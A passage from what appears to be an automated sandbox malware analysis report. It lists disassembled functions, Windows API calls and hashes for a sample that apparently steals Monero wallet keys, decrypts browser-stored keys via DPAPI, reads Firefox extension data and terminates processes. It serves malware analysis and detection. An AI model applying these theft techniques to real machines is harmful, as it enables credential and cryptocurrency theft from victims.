                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: 742514d84e17ab5e3407c6e035929ec2898f416081a67427b0dc647d0fbfc8dd
                          • Instruction ID: d57135a42e38e33b0724867557c15af92cf873920ce671819e1860a8b02a819f
                          • Opcode Fuzzy Hash: 742514d84e17ab5e3407c6e035929ec2898f416081a67427b0dc647d0fbfc8dd
                          • Instruction Fuzzy Hash: A2211FB1A40308AFDB04DF94DD49FAEBBB8FB48711F104259F605B7290CB79A901CBA1
                          Function 00928D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0092951E,00000000), ref: 00928D5B
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00928D62
                          • wsprintfW.USER32 ref: 00928D78
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          • Opcode ID: 5899e8a613e437bfa3e585097767abec973cfc7c329d3b13058fd8938e6b69a2
                          • Instruction ID: 1efe7482c0a6b80fd003325ceb439953072fdaeda54322b0ac8ff3b2160156f9
                          • Opcode Fuzzy Hash: 5899e8a613e437bfa3e585097767abec973cfc7c329d3b13058fd8938e6b69a2
                          • Instruction Fuzzy Hash: 56E0ECB5A40308BBD710DB94DD1AF6977B8EB48702F004294FE09A7280DE719E109B96
                          Function 0091A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                            • Part of subcall function 00928B60: GetSystemTime.KERNEL32(00930E1A,0104B3D0,009305AE,?,?,009113F9,?,0000001A,00930E1A,00000000,?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 00928B86
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0091A2E1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 0091A3FF
                          • lstrlen.KERNEL32(00000000), ref: 0091A6BC
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                          • DeleteFileA.KERNEL32(00000000), ref: 0091A743
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: a86ca04c643cf3231d124bf3eb8b67b895195b54d1e640540d63af3ab77362ab
                          • Instruction ID: 60a99362ab3a261cb7916d755bb15ed3702b5d5ecac456539597e08d72840e0c
                          • Opcode Fuzzy Hash: a86ca04c643cf3231d124bf3eb8b67b895195b54d1e640540d63af3ab77362ab
                          • Instruction Fuzzy Hash: 72E1DF739101289BDB05FBA4EC92FEE733CAF98300F508559F516760A5EF306A49CB66
                          Function 0091D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                            • Part of subcall function 00928B60: GetSystemTime.KERNEL32(00930E1A,0104B3D0,009305AE,?,?,009113F9,?,0000001A,00930E1A,00000000,?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 00928B86
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0091D481
                          • lstrlen.KERNEL32(00000000), ref: 0091D698
                          • lstrlen.KERNEL32(00000000), ref: 0091D6AC
                          • DeleteFileA.KERNEL32(00000000), ref: 0091D72B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 85c9f6af8e86ddcbe4ec4f8a0ab489a3a7a324f7a0e1a7ea9fbcdd3323c86e2d
                          • Instruction ID: 64c74c4ce344a2ba120b1f0cf93825431ae6f55a4eed94715c47af68851866d5
                          • Opcode Fuzzy Hash: 85c9f6af8e86ddcbe4ec4f8a0ab489a3a7a324f7a0e1a7ea9fbcdd3323c86e2d
                          • Instruction Fuzzy Hash: CC91F0739101289BDB04FBA4EC96FEE7339AF94300F504568F506B60A5EF346A49CB66
                          Function 0091D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                            • Part of subcall function 00928B60: GetSystemTime.KERNEL32(00930E1A,0104B3D0,009305AE,?,?,009113F9,?,0000001A,00930E1A,00000000,?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 00928B86
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0091D801
                          • lstrlen.KERNEL32(00000000), ref: 0091D99F
                          • lstrlen.KERNEL32(00000000), ref: 0091D9B3
                          • DeleteFileA.KERNEL32(00000000), ref: 0091DA32
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 9bca03dfde8887ca18939204656e57ea8e8bcd1676e48d76d3110c30a303e417
                          • Instruction ID: 7cffe09bd5ea758156cf71a66b5ca3eba82c9ceefdf3165ead9436c422673ca2
                          • Opcode Fuzzy Hash: 9bca03dfde8887ca18939204656e57ea8e8bcd1676e48d76d3110c30a303e417
                          • Instruction Fuzzy Hash: 0981EF739101289BDB04FBA4EC96FEE7339AF94300F504558F506B70A5EF346A49CBA6
                          Function 0091F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                            • Part of subcall function 009199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009199EC
                            • Part of subcall function 009199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919A11
                            • Part of subcall function 009199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00919A31
                            • Part of subcall function 009199C0: ReadFile.KERNEL32(000000FF,?,00000000,0091148F,00000000), ref: 00919A5A
                            • Part of subcall function 009199C0: LocalFree.KERNEL32(0091148F), ref: 00919A90
                            • Part of subcall function 009199C0: CloseHandle.KERNEL32(000000FF), ref: 00919A9A
                            • Part of subcall function 00928E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00928E52
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00931580,00930D92), ref: 0091F54C
                          • lstrlen.KERNEL32(00000000), ref: 0091F56B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 998311485-3310892237
                          • Opcode ID: b8717481a6bf366fd759f846cf4dcbd1c65207187d575e6c326c03bcc3143597
                          • Instruction ID: b7a11d6cfd178944c087e94c74861b88f91878b02c198e55c3067d04927cbfd6
                          • Opcode Fuzzy Hash: b8717481a6bf366fd759f846cf4dcbd1c65207187d575e6c326c03bcc3143597
                          • Instruction Fuzzy Hash: 48510276D10118ABDB04FBA4EC96EED737DAFD4300F408528F41667196EE346A09CBA6
                          Function 00923560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: e2f1d0cc8d5756e8d6b4feae45866400363aff09c1da5d3b5eaa095f8d083119
                          • Instruction ID: 4b1e909bb4a4f4cca967de7f57ca45339c96e7c5dc9c7f774954edde3ba76391
                          • Opcode Fuzzy Hash: e2f1d0cc8d5756e8d6b4feae45866400363aff09c1da5d3b5eaa095f8d083119
                          • Instruction Fuzzy Hash: 6E414571D10119AFCB04EFA4E856BFEB778AF84304F008418F41677255DB79AA09CF96
                          Function 00919CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 009199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009199EC
                            • Part of subcall function 009199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919A11
                            • Part of subcall function 009199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00919A31
                            • Part of subcall function 009199C0: ReadFile.KERNEL32(000000FF,?,00000000,0091148F,00000000), ref: 00919A5A
                            • Part of subcall function 009199C0: LocalFree.KERNEL32(0091148F), ref: 00919A90
                            • Part of subcall function 009199C0: CloseHandle.KERNEL32(000000FF), ref: 00919A9A
                            • Part of subcall function 00928E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00928E52
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00919D39
                            • Part of subcall function 00919AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00914EEE,00000000,00000000), ref: 00919AEF
                            • Part of subcall function 00919AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00914EEE,00000000,?), ref: 00919B01
                            • Part of subcall function 00919AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00914EEE,00000000,00000000), ref: 00919B2A
                            • Part of subcall function 00919AC0: LocalFree.KERNEL32(?,?,?,?,00914EEE,00000000,?), ref: 00919B3F
                            • Part of subcall function 00919B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00919B84
                            • Part of subcall function 00919B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00919BA3
                            • Part of subcall function 00919B60: LocalFree.KERNEL32(?), ref: 00919BD3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          • Opcode ID: 50d3a8c13769607d4daaf6ffec21175f000e4652a5a1280e7eb9dabae9decc72
                          • Instruction ID: 0ed9e4f217e78fcc01e08c80395e90a18b51e0be14fe0dae4055085bd0bd5a5f
                          • Opcode Fuzzy Hash: 50d3a8c13769607d4daaf6ffec21175f000e4652a5a1280e7eb9dabae9decc72
                          • Instruction Fuzzy Hash: A63112B6E1010DABCB04DFE4DD95BEFB7B8AF88304F144519F915A7285EB309A44CBA1
                          Function 009294D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 009294EB
                            • Part of subcall function 00928D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0092951E,00000000), ref: 00928D5B
                            • Part of subcall function 00928D50: RtlAllocateHeap.NTDLL(00000000), ref: 00928D62
                            • Part of subcall function 00928D50: wsprintfW.USER32 ref: 00928D78
                          • OpenProcess.KERNEL32(00001001,00000000,?), ref: 009295AB
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 009295C9
                          • CloseHandle.KERNEL32(00000000), ref: 009295D6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
